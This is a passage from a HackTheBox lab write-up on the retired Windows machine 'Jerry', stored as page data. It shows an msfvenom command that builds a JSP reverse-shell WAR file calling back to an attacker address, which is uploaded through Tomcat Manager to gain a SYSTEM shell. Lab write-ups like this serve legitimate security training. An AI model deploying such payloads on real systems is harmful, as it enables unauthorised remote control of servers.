id=\"gaining-a-shell\" style=\"position:relative;\"><a href=\"#gaining-a-shell\" aria-label=\"gaining a shell permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Gaining a Shell</h2>\n<p>Now that I had access to the Manager App, I looked for an exploit path.</p>\n<p>According to the following article, uploading a WAR file can be used to obtain a reverse shell.</p>\n<p>Reference: <a href=\"https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Multiple Ways to Exploit Tomcat Manager - Hacking Articles</a></p>\n<p>I created the payload with the following command:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">msfvenom -p java/jsp_shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.4 <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> -f war <span class=\"token operator\">></span> shell.war</code></pre></div>\n<p>After uploading it, accessing <code class=\"language-text\">10.10.10.95:8080/shell</code> from a browser gave me a shell with SYSTEM privileges.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>For password attacks, it pays to build a list of patterns to try manually before resorting to brute force.</p>","fields":{"slug":"/hackthebox-windows-jerry-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-30","description":"A writeup of the retired HackTheBox machine 'Jerry'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Jerry (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-jerry-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}